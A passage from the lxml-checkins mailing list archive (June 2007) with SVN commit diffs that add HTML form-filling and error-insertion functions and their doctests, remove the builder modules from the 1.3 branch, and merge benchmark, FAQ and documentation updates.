tuple)): + try: + value = value[index] + except IndexError: + continue + elif index > 0: + continue + _fill_single(input, value) + +def _takes_multiple(input): + if input.tag == 'select' and input.get('multiple'): + # FIXME: multiple="0"? + return True + type = input.get('type', '').lower() + if type in ('radio', 'checkbox'): + return True + return False + +def _fill_multiple(input, value): + type = input.get('type', '').lower() + if type == 'checkbox': + v = input.get('value') + if v is None: + if not value: + result = False + else: + result = value[0] + if isinstance(value, basestring): + # The only valid "on" value for an unnamed checkbox is 'on' + result = result == 'on' + _check(input, result) + else: + _check(input, v in value) + elif type == 'radio': + v = input.get('value') + _check(input, v in value) + else: + assert input.tag == 'select' + for option in input.findall('option'): + v = option.get('value') + if v is None: + # This seems to be the default, at least on IE + # FIXME: but I'm not sure + v = option.text_content() + _select(option, v in value) + +def _check(el, check): + if check: + el.set('checked', '') + else: + if 'checked' in el.attrib: + del el.attrib['checked'] + +def _select(el, select): + if select: + el.set('selected', '') + else: + if 'selected' in el.attrib: + del el.attrib['selected'] + +def _fill_single(input, value): + if input.tag == 'textarea': + input.clear() + input.text = value + else: + input.set('value', value) + +def _find_form(el, form_id=None, form_index=None): + if form_id is None and form_index is None: + forms = el.getiterator('form') + for form in forms: + return form + raise FormNotFound( + "No forms in page") + if form_id is not None: + form = el.get_element_by_id(form_id) + if form is not None: + return form + forms = _form_name_xpath(el, name=form_id) + if forms: + return forms[0] + else: + raise FormNotFound( + "No form with the name or id of %r (forms: %s)" + % (id, ', '.join(_find_form_ids(el)))) + if form_index 
is not None: + forms = el.getiterator('form') + try: + return forms[form_index] + except IndexError: + raise FormNotFound( + "There is no form with the index %r (%i forms found)" + % (form_index, len(forms))) + +def _find_form_ids(el): + forms = el.getiterator('form') + if not forms: + yield '(no forms)' + return + for index, form in enumerate(forms): + if form.get('id'): + if form.get('name'): + yield '%s or %s' % (form.get('id'), + form.get('name')) + else: + yield form.get('id') + elif form.get('name'): + yield form.get('name') + else: + yield '(unnamed form %s)' % index Added: lxml/branch/html/src/lxml/html/tests/test_formfill.py ============================================================================== --- (empty file) +++ lxml/branch/html/src/lxml/html/tests/test_formfill.py Fri Jun 15 00:04:11 2007 @@ -0,0 +1,7 @@ +import unittest +from lxml.tests.common_imports import doctest + +def test_suite(): + suite = unittest.TestSuite() + suite.addTests([doctest.DocFileSuite('test_formfill.txt')]) + return suite Added: lxml/branch/html/src/lxml/html/tests/test_formfill.txt ============================================================================== --- (empty file) +++ lxml/branch/html/src/lxml/html/tests/test_formfill.txt Fri Jun 15 00:04:11 2007 @@ -0,0 +1,54 @@ +Some basic imports: + + >>> from lxml.html import usedoctest + >>> from lxml.html.formfill import fill_form_html + +The simplest kind of filling is just filling an input with a value: + + >>> print fill_form_html(''' + ...
''', dict(foo='bar')) +
+ +You can also fill multiple inputs, like: + + >>> print fill_form_html(''' + ...
+ ... + ... + ...
''', dict(foo=['bar1', 'bar2'])) +
+ + +
+ +Checkboxes can work either as boolean true/false, or be selected based +on their inclusion in a set of values:: + + >>> print fill_form_html(''' + ...
+ ... Would you like to be spammed? + ...
+ ... Spam you'd like to receive:
+ ... Viagra spam: + ...
+ ... Stock spam: + ...
+ ... Other spam: + ...
+ ... + ...
''', dict(spam_me=True, type=['viagra', 'other'])) +
+ Would you like to be spammed? +
+ Spam you'd like to receive:
+ Viagra spam: +
+ Stock spam: +
+ Other spam: +
+ +
+ +FIXME: I need to test more of this. But I'm lazy and want to use the +coverage report for some of this. From ianb at codespeak.net Fri Jun 15 00:53:28 2007 From: ianb at codespeak.net (ianb at codespeak.net) Date: Fri, 15 Jun 2007 00:53:28 +0200 (CEST) Subject: [Lxml-checkins] r44258 - in lxml/branch/html/src/lxml/html: . tests Message-ID: <20070614225328.4F0058280@code0.codespeak.net> Author: ianb Date: Fri Jun 15 00:53:28 2007 New Revision: 44258 Modified: lxml/branch/html/src/lxml/html/formfill.py lxml/branch/html/src/lxml/html/tests/test_formfill.txt Log: Added error-filling function Modified: lxml/branch/html/src/lxml/html/formfill.py ============================================================================== --- lxml/branch/html/src/lxml/html/formfill.py (original) +++ lxml/branch/html/src/lxml/html/formfill.py Fri Jun 15 00:53:28 2007 @@ -1,5 +1,6 @@ -from lxml.etree import XPath -from lxml.html import HTML, tostring +from lxml.etree import XPath, ElementBase +from lxml.html import parse, tostring +from lxml.html import defs __all__ = ['FormNotFound', 'fill_form'] @@ -10,6 +11,8 @@ _form_name_xpath = XPath('descendant-or-self::form[name=$name]') _input_xpath = XPath('descendant-or-self::input | descendant-or-self::select | descendant-or-self::textarea') +_label_for_xpath = XPath('//label[@for=$for_id]') +_name_xpath = XPath('descendant-or-self::*[@name=$name]') def fill_form( el, @@ -22,7 +25,7 @@ def fill_form_html(html, values, form_id=None, form_index=None): if isinstance(html, basestring): - doc = HTML(html) + doc = parse(html) return_string = True else: doc = copy.deepcopy(html) @@ -164,3 +167,130 @@ yield form.get('name') else: yield '(unnamed form %s)' % index + +############################################################ +## Error filling +############################################################ + +class DefaultErrorCreator(object): + insert_before = True + block_inside = True + error_container_tag = 'div' + error_message_class = 
'error-message' + error_block_class = 'error-block' + default_message = "Invalid" + + def __init__(self, **kw): + for name, value in kw.items(): + if not hasattr(self, name): + raise TypeError( + "Unexpected keyword argument: %s" % name) + setattr(self, name, value) + + def __call__(self, el, is_block, message): + error_el = el.makeelement(self.error_container_tag) + if self.error_message_class: + error_el.set('class', self.error_message_class) + if is_block and self.error_block_class: + error_el.set('class', error_el.get('class', '')+' '+self.error_block_class) + if message is None or message == '': + message = self.default_message + if isinstance(message, ElementBase): + error_el.append(message) + else: + assert isinstance(message, basestring), ( + "Bad message; should be a string or element: %r" % message) + error_el.text = message or self.default_message + if is_block and self.block_inside: + if self.insert_before: + error_el.tail = el.text + el.text = None + el.insert(0, error_el) + else: + el.append(error_el) + else: + parent = el.getparent() + pos = parent.index(el) + if self.insert_before: + parent.insert(pos, error_el) + else: + error_el.tail = el.tail + el.tail = None + parent.insert(pos+1, error_el) + +default_error_creator = DefaultErrorCreator() + + +def insert_errors( + el, + errors, + form_id=None, + form_index=None, + error_class="error", + error_creator=default_error_creator, + ): + el = _find_form(el, form_id=form_id, form_index=form_index) + for name, error in errors.iteritems(): + if error is None: + continue + for error_el, message in _find_elements_for_name(el, name, error): + assert isinstance(message, (basestring, type(None), ElementBase)), ( + "Bad message: %r" % message) + _insert_error(error_el, message, error_class, error_creator) + +def insert_errors_html(html, values, **kw): + if isinstance(html, basestring): + doc = parse(html) + return_string = True + else: + doc = copy.deepcopy(html) + return_string = False + insert_errors(doc, 
values, **kw) + if return_string: + return tostring(doc) + else: + return doc + +def _insert_error(el, error, error_class, error_creator): + if el.tag in defs.empty_tags or el.tag == 'textarea': + is_block = False + else: + is_block = True + if el.tag != 'form' and error_class: + _add_class(el, error_class) + if el.get('id'): + labels = _label_for_xpath(el, for_id=el.get('id')) + if labels: + for label in labels: + _add_class(label, error_class) + error_creator(el, is_block, error) + +def _add_class(el, class_name): + if el.get('class'): + el.set('class', el.get('class')+' '+class_name) + else: + el.set('class', class_name) + +def _find_elements_for_name(form, name, error): + if name is None: + # An error for the entire form + yield form, error + return + if name.startswith('#'): + # By id + el = form.get_element_by_id(name[1:]) + if el is not None: + yield el, error + return + els = _name_xpath(form, name=name) + if not els: + # FIXME: should this raise an exception? + return + if not isinstance(error, (list, tuple)): + yield els[0], error + return + # FIXME: if error is longer than els, should it raise an error? + for el, err in zip(els, error): + if err is None: + continue + yield el, err Modified: lxml/branch/html/src/lxml/html/tests/test_formfill.txt ============================================================================== --- lxml/branch/html/src/lxml/html/tests/test_formfill.txt (original) +++ lxml/branch/html/src/lxml/html/tests/test_formfill.txt Fri Jun 15 00:53:28 2007 @@ -52,3 +52,49 @@ FIXME: I need to test more of this. But I'm lazy and want to use the coverage report for some of this. + + +This module also allows you to add error messages to the form. The errors +add an "error" class to the input fields, and any labels if the field +has a label. It also inserts an error message into the form, using a +function you can provide (or the default function). 
+ +Example:: + + >>> from lxml.html.formfill import insert_errors_html + >>> print insert_errors_html(''' + ...
+ ...
+ ...
+ ... + ...
+ ...
+ ... + ... + ... + ... + ...
''', { + ... 'v1': "err1", + ... 'v2': "err2", + ... 'v3': [None, "err3-2"], + ... 'v4': "err4", + ... None: 'general error', + ... '#fieldset': 'area error', + ... }) +
+
general error
+
+
area error
+
err1
+
+ +
err2
+
+
+ +
err3-2
+ +
err4
+ + +
From scoder at codespeak.net Fri Jun 15 10:25:31 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Fri, 15 Jun 2007 10:25:31 +0200 (CEST) Subject: [Lxml-checkins] r44265 - lxml/branch/lxml-1.3/src/lxml Message-ID: <20070615082531.CB566806D@code0.codespeak.net> Author: scoder Date: Fri Jun 15 10:25:31 2007 New Revision: 44265 Removed: lxml/branch/lxml-1.3/src/lxml/builder.py lxml/branch/lxml-1.3/src/lxml/htmlbuilder.py Log: removed FL's builder modules from 1.3 Deleted: /lxml/branch/lxml-1.3/src/lxml/builder.py ============================================================================== --- /lxml/branch/lxml-1.3/src/lxml/builder.py Fri Jun 15 10:25:31 2007 +++ (empty file) @@ -1,161 +0,0 @@ -""" -Element generator factory by Fredrik Lundh. - -Source: - http://online.effbot.org/2006_11_01_archive.htm#et-builder - http://effbot.python-hosting.com/file/stuff/sandbox/elementlib/builder.py -""" - -import etree as ET - -try: - from functools import partial -except ImportError: - # fake it for pre-2.5 releases - def partial(func, tag): - return lambda *args, **kwargs: func(tag, *args, **kwargs) - - -class _C: - pass - -class ElementMaker(object): - """Element generator factory. - - Unlike the ordinary Element factory, the E factory allows you to pass in - more than just a tag and some optional attributes; you can also pass in - text and other elements. The text is added as either text or tail - attributes, and elements are inserted at the right spot. 
Some small - examples:: - - >>> from lxml import etree as ET - >>> from lxml.builder import E - - >>> ET.tostring(E("tag")) - '' - >>> ET.tostring(E("tag", "text")) - 'text' - >>> ET.tostring(E("tag", "text", key="value")) - 'text' - >>> ET.tostring(E("tag", E("subtag", "text"), "tail")) - 'texttail' - - For simple tags, the factory also allows you to write ``E.tag(...)`` instead - of ``E('tag', ...)``:: - - >>> ET.tostring(E.tag()) - '' - >>> ET.tostring(E.tag("text")) - 'text' - >>> ET.tostring(E.tag(E.subtag("text"), "tail")) - 'texttail' - - Here's a somewhat larger example; this shows how to generate HTML - documents, using a mix of prepared factory functions for inline elements, - nested ``E.tag`` calls, and embedded XHTML fragments:: - - # some common inline elements - A = E.a - I = E.i - B = E.b - - def CLASS(v): - # helper function, 'class' is a reserved word - return {'class': v} - - page = ( - E.html( - E.head( - E.title("This is a sample document") - ), - E.body( - E.h1("Hello!", CLASS("title")), - E.p("This is a paragraph with ", B("bold"), " text in it!"), - E.p("This is another paragraph, with a ", - A("link", href="http://www.python.org"), "."), - E.p("Here are some reservered characters: ."), - ET.XML("

And finally, here is an embedded XHTML fragment.

"), - ) - ) - ) - - print ET.tostring(page) - - Here's a prettyprinted version of the output from the above script:: - - - - This is a sample document - - -

Hello!

-

This is a paragraph with bold text in it!

-

This is another paragraph, with link.

-

Here are some reservered characters: <spam&egg>.

-

And finally, here is an embedded XHTML fragment.

- - - """ - - def __init__(self, typemap=None): - # initialize type map for this element factory - - if typemap: - typemap = typemap.copy() - else: - typemap = {} - - def add_text(elem, item): - if len(elem): - elem[-1].tail = (elem[-1].tail or "") + item - else: - elem.text = (elem.text or "") + item - typemap[str] = typemap[unicode] = add_text - - def add_dict(elem, item): - attrib = elem.attrib - for k, v in item.items(): - if isinstance(v, basestring): - attrib[k] = v - else: - attrib[k] = typemap[type(v)](None, v) - typemap[dict] = add_dict - - def add_elem(elem, item): - elem.append(item) - t = type(ET.Element("tag")) - if t is not type(_C()): - typemap[t] = add_elem - - self._typemap = typemap - - # print typemap - - def __call__(self, tag, *children, **attrib): - get = self._typemap.get - - elem = ET.Element(tag) - if attrib: - get(dict)(elem, attrib) - - for item in children: - if callable(item): - item = item() - t = get(type(item)) - if t is None: - if ET.iselement(item): - elem.append(item) - continue - raise TypeError("bad argument type: %r" % item) - else: - v = t(elem, item) - if v: - get(type(v))(elem, v) - - return elem - - def __getattr__(self, tag): - return partial(self, tag) - -# create factory object -E = ElementMaker() Deleted: /lxml/branch/lxml-1.3/src/lxml/htmlbuilder.py ============================================================================== --- /lxml/branch/lxml-1.3/src/lxml/htmlbuilder.py Fri Jun 15 10:25:31 2007 +++ (empty file) @@ -1,125 +0,0 @@ -""" -HTML specialisation of ``builder.py`` by Fredrik Lundh - -Usage:: - - >>> from lxml.htmlbuilder import * - >>> html = HTML( - ... HEAD( TITLE("Hello World") ), - ... BODY( CLASS("main"), - ... H1("Hello World !") - ... ) - ... ) - - >>> import lxml.etree - >>> print lxml.etree.tostring(html, pretty_print=True) - - - Hello World - - -

Hello World !

- - - -""" - -from builder import E - -# elements -A = E.a # anchor -ABBR = E.abbr # abbreviated form (e.g., WWW, HTTP, etc.) -ACRONYM = E.acronym # -ADDRESS = E.address # information on author -APPLET = E.applet # Java applet (DEPRECATED) -AREA = E.area # client-side image map area -B = E.b # bold text style -BASE = E.base # document base URI -BASEFONT = E.basefont # base font size (DEPRECATED) -BDO = E.bdo # I18N BiDi over-ride -BIG = E.big # large text style -BLOCKQUOTE = E.blockquote # long quotation -BODY = E.body # document body -BR = E.br # forced line break -BUTTON = E.button # push button -CAPTION = E.caption # table caption -CENTER = E.center # shorthand for DIV align=center (DEPRECATED) -CITE = E.cite # citation -CODE = E.code # computer code fragment -COL = E.col # table column -COLGROUP = E.colgroup # table column group -DD = E.dd # definition description -DEL = getattr(E, 'del') # deleted text -DFN = E.dfn # instance definition -DIR = E.dir # directory list (DEPRECATED) -DIV = E.div # generic language/style container -DL = E.dl # definition list -DT = E.dt # definition term -EM = E.em # emphasis -FIELDSET = E.fieldset # form control group -FONT = E.font # local change to font (DEPRECATED) -FORM = E.form # interactive form -FRAME = E.frame # subwindow -FRAMESET = E.frameset # window subdivision -H1 = E.h1 # heading -H2 = E.h2 # heading -H3 = E.h3 # heading -H4 = E.h4 # heading -H5 = E.h5 # heading -H6 = E.h6 # heading -HEAD = E.head # document head -HR = E.hr # horizontal rule -HTML = E.html # document root element -I = E.i # italic text style -IFRAME = E.iframe # inline subwindow -IMG = E.img # Embedded image -INPUT = E.input # form control -INS = E.ins # inserted text -ISINDEX = E.isindex # single line prompt (DEPRECATED) -KBD = E.kbd # text to be entered by the user -LABEL = E.label # form field label text -LEGEND = E.legend # fieldset legend -LI = E.li # list item -LINK = E.link # a media-independent link -MAP = E.map # client-side image map -MENU 
= E.menu # menu list (DEPRECATED) -META = E.meta # generic metainformation -NOFRAMES = E.noframes # alternate content container for non frame-based rendering -NOSCRIPT = E.noscript # alternate content container for non script-based rendering -OBJECT = E.object # generic embedded object -OL = E.ol # ordered list -OPTGROUP = E.optgroup # option group -OPTION = E.option # selectable choice -P = E.p # paragraph -PARAM = E.param # named property value -PRE = E.pre # preformatted text -Q = E.q # short inline quotation -S = E.s # strike-through text style (DEPRECATED) -SAMP = E.samp # sample program output, scripts, etc. -SCRIPT = E.script # script statements -SELECT = E.select # option selector -SMALL = E.small # small text style -SPAN = E.span # generic language/style container -STRIKE = E.strike # strike-through text (DEPRECATED) -STRONG = E.strong # strong emphasis -STYLE = E.style # style info -SUB = E.sub # subscript -SUP = E.sup # superscript -TABLE = E.table # -TBODY = E.tbody # table body -TD = E.td # table data cell -TEXTAREA = E.textarea # multi-line text field -TFOOT = E.tfoot # table footer -TH = E.th # table header cell -THEAD = E.thead # table header -TITLE = E.title # document title -TR = E.tr # table row -TT = E.tt # teletype or monospaced text style -U = E.u # underlined text style (DEPRECATED) -UL = E.ul # unordered list -VAR = E.var # instance of a variable or program argument - -# attributes (only reserved words are included here) -ATTR = dict -def CLASS(v): return {'class': v} -def FOR(v): return {'for': v} From scoder at codespeak.net Fri Jun 15 11:19:26 2007 From: scoder at codespeak.net (scoder at codespeak.net) Date: Fri, 15 Jun 2007 11:19:26 +0200 (CEST) Subject: [Lxml-checkins] r44274 - in lxml/branch/lxml-1.3: . 
benchmark doc src/lxml src/lxml/tests Message-ID: <20070615091926.C2DD3828B@code0.codespeak.net> Author: scoder Date: Fri Jun 15 11:19:25 2007 New Revision: 44274 Modified: lxml/branch/lxml-1.3/CHANGES.txt lxml/branch/lxml-1.3/TODO.txt lxml/branch/lxml-1.3/benchmark/bench_etree.py lxml/branch/lxml-1.3/benchmark/bench_xpath.py lxml/branch/lxml-1.3/doc/FAQ.txt lxml/branch/lxml-1.3/doc/api.txt lxml/branch/lxml-1.3/doc/main.txt lxml/branch/lxml-1.3/doc/mkhtml.py lxml/branch/lxml-1.3/doc/objectify.txt lxml/branch/lxml-1.3/doc/performance.txt lxml/branch/lxml-1.3/doc/validation.txt lxml/branch/lxml-1.3/doc/xpathxslt.txt lxml/branch/lxml-1.3/src/lxml/apihelpers.pxi lxml/branch/lxml-1.3/src/lxml/classlookup.pxi lxml/branch/lxml-1.3/src/lxml/dtd.pxi lxml/branch/lxml-1.3/src/lxml/etree.pyx lxml/branch/lxml-1.3/src/lxml/etreepublic.pxd lxml/branch/lxml-1.3/src/lxml/extensions.pxi lxml/branch/lxml-1.3/src/lxml/nsclasses.pxi lxml/branch/lxml-1.3/src/lxml/objectify.pyx lxml/branch/lxml-1.3/src/lxml/parser.pxi lxml/branch/lxml-1.3/src/lxml/public-api.pxi lxml/branch/lxml-1.3/src/lxml/relaxng.pxi lxml/branch/lxml-1.3/src/lxml/sax.py lxml/branch/lxml-1.3/src/lxml/tests/test_etree.py lxml/branch/lxml-1.3/src/lxml/tests/test_objectify.py lxml/branch/lxml-1.3/src/lxml/tests/test_xslt.py lxml/branch/lxml-1.3/src/lxml/xmlerror.pxi lxml/branch/lxml-1.3/src/lxml/xmlschema.pxi Log: big manual merge of loads of small stuff that was left out in the last trunk merges Modified: lxml/branch/lxml-1.3/CHANGES.txt ============================================================================== --- lxml/branch/lxml-1.3/CHANGES.txt (original) +++ lxml/branch/lxml-1.3/CHANGES.txt Fri Jun 15 11:19:25 2007 @@ -8,6 +8,8 @@ Features added -------------- +* ``parse()`` function in ``objectify``, corresponding to ``XML()`` etc. 
+ * ``Element.addnext(el)`` and ``Element.addprevious(el)`` methods to support adding processing instructions and comments around the root node Modified: lxml/branch/lxml-1.3/TODO.txt ============================================================================== --- lxml/branch/lxml-1.3/TODO.txt (original) +++ lxml/branch/lxml-1.3/TODO.txt Fri Jun 15 11:19:25 2007 @@ -1,3 +1,7 @@ +=============== +ToDo's for lxml +=============== + lxml ==== @@ -12,8 +16,6 @@ * test namespaces more in-depth -* will namespace nodes of unknown namespaces be added (and never freed?) - * more testing on multi-threading Modified: lxml/branch/lxml-1.3/benchmark/bench_etree.py ============================================================================== --- lxml/branch/lxml-1.3/benchmark/bench_etree.py (original) +++ lxml/branch/lxml-1.3/benchmark/bench_etree.py Fri Jun 15 11:19:25 2007 @@ -212,10 +212,14 @@ child[:] @children + @with_attributes(True, False) + @with_text(utext=True, text=True, no_text=True) def bench_deepcopy(self, children): for child in children: copy.deepcopy(child) + @with_attributes(True, False) + @with_text(utext=True, text=True, no_text=True) def bench_deepcopy_all(self, root): copy.deepcopy(root) Modified: lxml/branch/lxml-1.3/benchmark/bench_xpath.py ============================================================================== --- lxml/branch/lxml-1.3/benchmark/bench_xpath.py (original) +++ lxml/branch/lxml-1.3/benchmark/bench_xpath.py Fri Jun 15 11:19:25 2007 @@ -39,32 +39,33 @@ @onlylib('lxe') @children def bench_xpath_old_extensions(self, children): - def return_child(_, element): - if element: - return element[0] + def return_child(_, elements): + if elements: + return elements[0][0] else: return () - extensions = {(None, 'child') : return_child} - xpath = self.etree.XPath("child(.)", extensions=extensions) + extensions = {("test", "child") : return_child} + xpath = self.etree.XPath("t:child(.)", namespaces={"test":"t"}, + extensions=extensions) for child 
in children: xpath(child) @onlylib('lxe') @children def bench_xpath_extensions(self, children): - def return_child(_, element): - if element: - return element[0] + def return_child(_, elements): + if elements: + return elements[0][0] else: return () - self.etree.FunctionNamespace("test")["t"] = return_child + self.etree.FunctionNamespace("testns")["t"] = return_child try: - xpath = self.etree.XPath("test:t(.)", {"test":"test"}) + xpath = self.etree.XPath("test:t(.)", {"test":"testns"}) for child in children: xpath(child) finally: - del self.etree.FunctionNamespace("test")["t"] + del self.etree.FunctionNamespace("testns")["t"] if __name__ == '__main__': benchbase.main(XPathBenchMark) Modified: lxml/branch/lxml-1.3/doc/FAQ.txt ============================================================================== --- lxml/branch/lxml-1.3/doc/FAQ.txt (original) +++ lxml/branch/lxml-1.3/doc/FAQ.txt Fri Jun 15 11:19:25 2007 @@ -2,6 +2,12 @@ Frequently Asked Questions (FAQ) ================================ +.. meta:: + :description: Frequently Asked Questions about lxml (FAQ) + :keywords: lxml, lxml.etree, FAQ, frequently asked questions + :authors: Stefan Behnel, and various people on the mailing list + + See also the notes on compatibility_ to ElementTree_. .. _compatibility: compatibility.html @@ -22,7 +28,7 @@ 2.1 Why is lxml not written in Python? 2.2 How can I contribute? 3 Bugs - 3.1 My application crashes! Why does lxml.etree do that? + 3.1 My application crashes! 3.2 I think I have found a bug in lxml. What should I do? 4 Threading 4.1 Can I use threads to concurrently access the lxml API? @@ -272,45 +278,68 @@ Bugs ==== -My application crashes! Why does lxml.etree do that? ----------------------------------------------------- +My application crashes! 
+----------------------- One of the goals of lxml is "no segfaults", so if there is no clear warning in the documentation that you were doing something potentially harmful, you have found a bug and we would like to hear about it. Please report this bug to the `mailing list`_. See the next section on how to do that. +However, there are a few things to try first, to make sure the problem is +really within lxml (or libxml2 or libxslt): -I think I have found a bug in lxml. What should I do? ------------------------------------------------------ +a) If your application (or e.g. your web container) uses threads, please see + the FAQ section on threading to check if you touch on one of the + potential pitfalls. + +b) If you are on Mac-OS X, make sure lxml uses the correct libraries. If you + have updated the old system libraries (e.g. through fink), this is best + achieved by building lxml statically to prevent the different library + versions from interfering. If you choose to use a dynamically linked + version, make sure the ``DYLD_LIBRARY_PATH`` environment variable + contains the directory where you installed the libraries. + +In any case, try to reproduce the problem with the latest versions of +libxml2 and libxslt. From time to time, bugs and race conditions are found +in these libraries, so a more recent version might already contain a fix for +your problem. -a) First, you should look at the `current developer changelog`_ to see if this - is a known problem that has already been fixed in the SVN trunk. - .. _`current developer changelog`: http://codespeak.net/svn/lxml/trunk/CHANGES.txt - -b) If you are using threads, please see the following section to check if - you touch on one of the potential pitfalls. +I think I have found a bug in lxml. What should I do? +----------------------------------------------------- -c) Try to reproduce the problem with the latest versions of libxml2 and - libxslt. 
From time to time, bugs and race conditions are found in these - libraries, so a more recent version might already contain a fix for your - problem. - -d) Otherwise, we would really like to hear about it. Please report it to the - `mailing list`_ so that we can fix it. It is very helpful in this case if - you can come up with a short code snippet that demonstrates your problem. - Please also report the version of lxml, libxml2 and libxslt that you are - using by calling this:: - - from lxml import etree - print "lxml.etree: ", etree.LXML_VERSION - print "libxml used: ", etree.LIBXML_VERSION - print "libxml compiled: ", etree.LIBXML_COMPILED_VERSION - print "libxslt used: ", etree.LIBXSLT_VERSION - print "libxslt compiled: ", etree.LIBXSLT_COMPILED_VERSION +First, you should look at the `current developer changelog`_ to see if this +is a known problem that has already been fixed in the SVN trunk since the +release you are using. + +.. _`current developer changelog`: http://codespeak.net/svn/lxml/trunk/CHANGES.txt + +Also, the 'crash' section above has some good advice on what to try to see if +the problem is really in lxml - and not in your setup. Believe it or not, +that happens more often than you might think, especially when old libraries +or even multiple library versions are installed. + +You should always try to reproduce the problem with the latest versions of +libxml2 and libxslt - and make sure they are used (``lxml.etree`` can tell +you what it runs with, see below). + +Otherwise, we would really like to hear about it. Please report it to the +`mailing list`_ so that we can fix it. It is very helpful in this case if +you can come up with a short code snippet that demonstrates your problem. +If others can reproduce and see the problem, it is much easier for them to +fix it - and maybe even easier for you to describe it and get people +convinced that it really is a problem to fix.
Please also report the +version of lxml, libxml2 and libxslt that you are using by calling this:: + + from lxml import etree + print "lxml.etree: ", etree.LXML_VERSION + print "libxml used: ", etree.LIBXML_VERSION + print "libxml compiled: ", etree.LIBXML_COMPILED_VERSION + print "libxslt used: ", etree.LIBXSLT_VERSION + print "libxslt compiled: ", etree.LIBXSLT_COMPILED_VERSION - .. _`mailing list`: http://codespeak.net/mailman/listinfo/lxml-dev +.. _`mailing list`: http://codespeak.net/mailman/listinfo/lxml-dev Threading Modified: lxml/branch/lxml-1.3/doc/api.txt ============================================================================== --- lxml/branch/lxml-1.3/doc/api.txt (original) +++ lxml/branch/lxml-1.3/doc/api.txt Fri Jun 15 11:19:25 2007 @@ -265,18 +265,44 @@ -By default, lxml (and ElementTree) output the XML declaration only if it is -required. You can enable or disable it explicitly by passing another keyword -argument for the serialisation:: +By default, lxml (just as ElementTree) outputs the XML declaration only if it +is required by the standard:: - >>> print etree.tostring(root, xml_declaration=True) - - + >>> unicode_root = etree.Element(u"t\u1234st") + >>> unicode_root.text = u"t\u4321st" + >>> etree.tostring(unicode_root, encoding="utf-8") + 't\xe4\x8c\xa1st' + + >>> print etree.tostring(unicode_root, encoding="iso-8859-1") + + t䌡st Also see the general remarks on `Unicode support`_. .. _`Unicode support`: parsing.html#python-unicode-strings +You can enable or disable the declaration explicitly by passing another +keyword argument for the serialisation:: + + >>> print etree.tostring(root, xml_declaration=True) + + + + >>> etree.tostring(unicode_root, encoding="utf-8", + ... xml_declaration=False) + 't\xe4\x8c\xa1st' + +Note that a standard compliant XML parser will not consider the last line +well-formed XML if the encoding is not explicitly provided somehow, e.g. 
in an +underlying transport protocol:: + + >>> notxml = etree.tostring(unicode_root, encoding="utf-8", + ... xml_declaration=False) + >>> etree.XML(notxml) + Traceback (most recent call last): + ... + XMLSyntaxError: line 1: Extra content at the end of the document + XInclude and ElementInclude --------------------------- Modified: lxml/branch/lxml-1.3/doc/main.txt ============================================================================== --- lxml/branch/lxml-1.3/doc/main.txt (original) +++ lxml/branch/lxml-1.3/doc/main.txt Fri Jun 15 11:19:25 2007 @@ -4,8 +4,8 @@ .. contents:: .. 1 Introduction - 2 Download - 3 Documentation + 2 Documentation + 3 Download 4 Mailing list 5 License 6 Old Versions @@ -25,42 +25,6 @@ .. _FAQ: FAQ.html -Download --------- - -The best way to download binary versions is to visit `lxml at the Python -cheeseshop`_. It has the source, eggs and installers for various platforms. -The source distribution is signed with `this key`_. - -.. _`lxml at the Python cheeseshop`: http://cheeseshop.python.org/pypi/lxml/ -.. _`this key`: pubkey.asc - -The latest version is `lxml 1.3beta`_, released 2007-02-27 (`changes for 1.3beta`_). -`Older versions`_ are listed below. - -.. _`lxml 1.3beta`: lxml-1.3beta.tgz -.. _`CHANGES for 1.3beta`: changes-1.3beta.html -.. _`Older versions`: #old-versions - -Please take a look at the `installation instructions`_! - -.. _`installation instructions`: installation.html - -It's also possible to check out the latest development version of lxml -from svn directly, using a command like this:: - - svn co http://codespeak.net/svn/lxml/trunk lxml - -You can also `browse it through the web`_. Please read `how to build lxml -from source`_ first. The `latest CHANGES`_ of the developer version are also -accessible. You can check there if a bug you found has been fixed or a -feature you want has been implemented in the latest trunk version. - -.. _`how to build lxml from source`: build.html -.. 
_`browse it through the web`: http://codespeak.net/svn/lxml -.. _`latest CHANGES`: http://codespeak.net/svn/lxml/trunk/CHANGES.txt - - Documentation ------------- @@ -74,6 +38,8 @@ * lxml.etree: + * the `lxml.etree Tutorial`_ + * `lxml.etree specific API`_ documentation * parsing_ and validating_ XML @@ -95,17 +61,19 @@ * a brief comparison of `objectify and etree`_ lxml.etree follows the ElementTree_ API as much as possible, building it on -top of the native libxml2 tree. See also the ElementTree compatibility_ -overview and the `benchmark results`_ comparing lxml to the original -ElementTree_ and cElementTree_ implementations. - -Right after the ElementTree_ documentation, the most important place to look -is the `lxml.etree specific API`_ documentation. It describes how lxml extends the -ElementTree API to expose libxml2 and libxslt specific functionality, such as -XPath_, `Relax NG`_, `XML Schema`_, `XSLT`_, and `c14n`_. Python code can be -called from XPath expressions and XSLT stylesheets through the use of -`extension functions`_. lxml also offers a `SAX compliant API`_, that works -with the SAX support in the standard library. +top of the native libxml2 tree. If you are new to ElementTree, start with the +`lxml.etree Tutorial`_. See also the ElementTree compatibility_ overview and +the `benchmark results`_ comparing lxml to the original ElementTree_ and +cElementTree_ implementations. + +Right after the `lxml.etree Tutorial`_ and the ElementTree_ documentation, the +most important place to look is the `lxml.etree specific API`_ documentation. +It describes how lxml extends the ElementTree API to expose libxml2 and +libxslt specific functionality, such as XPath_, `Relax NG`_, `XML Schema`_, +`XSLT`_, and `c14n`_. Python code can be called from XPath expressions and +XSLT stylesheets through the use of `extension functions`_. lxml also offers +a `SAX compliant API`_, that works with the SAX support in the standard +library. 
There is a separate module `lxml.objectify`_ that implements a data-binding API on top of lxml.etree. See the `objectify and etree`_ FAQ entry for a @@ -120,6 +88,7 @@ .. _ElementTree: http://effbot.org/zone/element-index.htm .. _cElementTree: http://effbot.org/zone/celementtree.htm +.. _`lxml.etree Tutorial`: tutorial.html .. _`benchmark results`: performance.html .. _`compatibility`: compatibility.html .. _`lxml.etree specific API`: api.html @@ -140,6 +109,42 @@ .. _`c14n`: http://www.w3.org/TR/xml-c14n +Download +-------- + +The best way to download binary versions is to visit `lxml at the Python +cheeseshop`_. It has the source, eggs and installers for various platforms. +The source distribution is signed with `this key`_. + +.. _`lxml at the Python cheeseshop`: http://cheeseshop.python.org/pypi/lxml/ +.. _`this key`: pubkey.asc + +The latest version is `lxml 1.3beta`_, released 2007-02-27 (`changes for 1.3beta`_). +`Older versions`_ are listed below. + +.. _`lxml 1.3beta`: lxml-1.3beta.tgz +.. _`CHANGES for 1.3beta`: changes-1.3beta.html +.. _`Older versions`: #old-versions + +Please take a look at the `installation instructions`_! + +.. _`installation instructions`: installation.html + +It's also possible to 